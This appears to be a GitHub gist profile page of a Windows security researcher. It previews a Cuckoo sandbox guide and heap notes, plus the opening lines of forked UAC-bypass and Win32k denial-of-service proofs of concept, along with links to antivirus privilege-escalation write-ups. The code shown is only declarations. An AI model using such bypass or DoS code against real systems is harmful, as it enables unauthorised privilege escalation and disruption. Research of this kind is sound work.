Skip to content

Instantly share code, notes, and snippets.

Avatar
😵
type confused

fdiskyou

😵
type confused
View GitHub Profile
View _HEAP.md

Windows 7 x64

0:004> dt nt!_HEAP
ntdll!_HEAP
   +0x000 Entry            : _HEAP_ENTRY
   +0x010 SegmentSignature : Uint4B
   +0x014 SegmentFlags     : Uint4B
   +0x018 SegmentListEntry : _LIST_ENTRY
   +0x028 Heap             : Ptr64 _HEAP
View mostly_painless_cuckoo_sandbox_install.md

How to Build a Cuckoo Sandbox Malware Analysis System

I had a heck of a time getting a Cuckoo sandbox running, and below I hope to help you get one up and running relatively quickly by detailing out the steps and gotchas I stumbled across along the way. I mention this in the references at the end of this gist, but what you see here is heavily influenced by this article from Nviso

Build your Linux Cuckoo VM

  1. Setup a Ubuntu 16.04 64-bit desktop VM (download here) in VMWare with the following properties:
  • 100GB hard drive
  • 2 procs
  • 8 gigs of RAM
@fdiskyou
fdiskyou / clr_via_native.c
Created Feb 7, 2020 — forked from masterofpwn/clr_via_native.c
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@fdiskyou
fdiskyou / delete_git_submodule.md
Created Dec 13, 2019 — forked from myusuf3/delete_git_submodule.md
How effectively delete a git submodule.
View delete_git_submodule.md

To remove a submodule you need to:

  • Delete the relevant section from the .gitmodules file.
  • Stage the .gitmodules changes git add .gitmodules
  • Delete the relevant section from .git/config.
  • Run git rm --cached path_to_submodule (no trailing slash).
  • Run rm -rf .git/modules/path_to_submodule (no trailing slash).
  • Commit git commit -m "Removed submodule "
  • Delete the now untracked submodule files rm -rf path_to_submodule
View AV2019.txt
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
View gist:9a93d9941ee86a430c97149bf9535ac3
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
@fdiskyou
fdiskyou / akagi_42b.c
Created Nov 14, 2019 — forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
View akagi_42b.c
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@fdiskyou
fdiskyou / akagi_49a.c
Created Nov 14, 2019 — forked from hfiref0x/akagi_49a.c
UAC bypass using CreateNewLink COM interface
View akagi_49a.c
typedef struct tagCREATELINKDATA {
ULONG dwFlags;
WCHAR szLinkName[MAX_PATH]; // + 0x20C
WCHAR szExeName[MAX_PATH]; // + 0x414
WCHAR szParams[MAX_PATH]; // + 0x61C
WCHAR szWorkingDir[MAX_PATH]; // + 0x824
WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
WCHAR szExpExeName[MAX_PATH]; // + 0xC34
WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
WCHAR szFolder[MAX_PATH]; // + 0x1044
@fdiskyou
fdiskyou / NtUserCreateActivationObject.cpp
Created Nov 14, 2019 — forked from hfiref0x/NtUserCreateActivationObject.cpp
Win32k NtUserCreateActivationObject Denial Of Service (19H1)
View NtUserCreateActivationObject.cpp
#include <iostream>
#include <conio.h>
#include <Windows.h>
typedef LONG(WINAPI *pNtUserCreateActivationObject)(
HWND hwnd,
ULONG_PTR Irrelevant1,
LUID *Luid);
HCRYPTPROV g_hCryptoProvider = NULL;
@fdiskyou
fdiskyou / akagi_58a.c
Created Nov 14, 2019 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
View akagi_58a.c
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
You can’t perform that action at this time.